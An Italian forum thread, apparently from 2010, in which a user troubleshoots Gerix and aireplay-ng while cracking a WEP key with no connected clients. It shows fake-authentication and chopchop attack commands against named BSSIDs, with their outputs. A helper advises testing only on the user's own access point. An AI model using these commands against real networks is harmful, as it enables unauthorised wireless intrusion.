Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Problema GERIX

  1. #1
    Junior Member
    Join Date
    Feb 2010
    Posts
    29

    Default Problema GERIX

    Salve ,Il problema e questo, volendo recuperare la key Wep con Gerix in modo (Wep Attacks no-client ) ottengo un errore quando invio il comando :
    ( Create The ARP packet to be injected on the victim access point) che mi da l'errore
    Error opening /root/.gerix-wifi-cracker/*.xor "packetforge-ng --help" for help. [Failure]

    esiste una soluzione? grazie

  2. #2
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    si vede che l'attacco chopchop o fragmentation non Ŕ andato a buon fine..

    prova con l'attacco con i client connessi, usando la fake-auth

    altrimenti prima di usare gerix, usa manualmente la suite di aircrack-ng per capire bene i processi che lui automatizza

    ciao!

  3. #3
    Junior Member
    Join Date
    Feb 2010
    Posts
    29

    Default

    l'attacco e in modo senza clienti connessi dunque chopchop attack ,fake clinte succes ecco la risposta:

    aireplay-ng -1 0 -a 00:1A:C1:15:BE:00 -h 00:E0:4C:05:1A:00 mon0 comando per associare

    13:31:11 Waiting for beacon frame (BSSID: 00:1A:00:15:00:34) on channel 11

    13:31:11 Sending Authentication Request (Open System) [ACK]
    13:31:11 Authentication successful
    13:31:11 Sending Association Request [ACK]
    13:31:11 Association successful :-) (AID: 1)

    fin qua tutto ok almeno secondo il mio parere.


    il problema e che quando do via al pulsante chopchop mi resta con questa finestra


    ================================================== ==
    aireplay-ng -4 -b 00:00:C1:15:BE:00 -h 00:E0:4C:05:1A:00 mon0
    13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
    ^Cad 1502 packets...
    ================================================== ===


    cattura pacchetti e non mi esce la conferma con Y di norma mi avrebbe dovuto dare questa risposta

    ----------------------------------------------------------------------
    Read 165 packets...

    Size: 86, FromDS: 1, ToDS: 0 (WEP)

    BSSID = 00:14:6C:7E:40:80
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:40:F4:77:E5:C9

    0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
    0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
    0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
    0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
    0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
    0x0050: cfeb 4a72 be46 ..Jr.F

    Use this packet ? y
    ------------------------------------------------------------------------


    allora mi domando ma l'attacco chopchop perchÚ non parte avendo associato il mio indirizzo e recuperato 1502 packets... nell'esempio parte dopo solo 165 packets. , oppure non e sistematico che parte subito e possono passare delle ore ? grazie di una risposta.

  4. #4
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    come ti dicevo prima, prova anche con gli altri metodi (fake-auth -> arp-replay) anche se non penso che otterrai risultati positivi..

    1) che scheda hai? dacci qualche info in pi¨, potrebbe non essere supportata
    2) quanto stai lontano dall'AP? il segnale Ŕ buono?
    3) le statistiche sui pacchetti di airodump che dicono mentre provi a fare l'attacco?

  5. #5
    Junior Member
    Join Date
    Feb 2010
    Posts
    29

    Default

    scheda usb con chip rtl 8187L

    per il segnale guarda qui penso che sia buono , ti metto i risultati di 3 shell
    --------------------------------------------------------------------------------
    CH 11 ][ Elapsed: 7 mins ][ 2010-02-28 14:22

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E

    00:1A:C1:15:BE:34 -71 100 4538 0 0 11 54 . WEP WEP OPN 3

    BSSID STATION PWR Rate Lost Packets Probes

    00:1A:C1:15:BE:34 00:E0:4C:05:1A:32 0 0 - 1 0 16
    -----------------------------------------------------------------------------------

    poi per associare ok vedi sopra che e inserito

    -----------------------------------------------------------------------------------
    root@bt:~# aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
    14:20:44 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11

    14:20:44 Sending Authentication Request (Open System) [ACK]
    14:20:44 Authentication successful
    14:20:44 Sending Association Request [ACK]
    14:20:44 Association successful :-) (AID: 1)
    ------------------------------------------------------------------------------------

    poi attacco chopchop

    --------------------------------------------------------------------------------------
    root@bt:~# aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
    14:22:04 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
    ^Cad 303 packets...

    -------------------------------------------------------------------------------------

    qui pure se i pacchetti salgono, di risposta Y niente.

  6. #6
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    il segnale Ŕ un p˛ deboluccio. se quell'ap Ŕ tuo allora mettitelo vicino al pc per fare i test, se non lo Ŕ lascia perdere..

    ciao!

  7. #7
    Junior Member
    Join Date
    Feb 2010
    Posts
    29

    Default

    scusa ma il segnale non Ú 71?

  8. #8
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    guarda bene, ti indica -71.

    il fattore distanza potrebbe essere una delle cause dei tuoi problemi. quindi la mia risposta precedente rimane: se l'ap Ŕ il tuo fai i test mettendolo vicino al pc

  9. #9
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    23

    Default

    ma scusate allora questo errore
    ( Create The ARP packet to be injected on the victim access point)
    Error opening /root/.gerix-wifi-cracker/*.xor "packetforge-ng --help" for help. [Failure]

    COS'╚???

    per capire.. grazie

  10. #10
    Member ReversaL's Avatar
    Join Date
    Jan 2010
    Posts
    166

    Default

    a giudicare dall'errore sembra che il file .xor proprio non sia stato creato.. controlla nella directory se esiste

    ciao

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •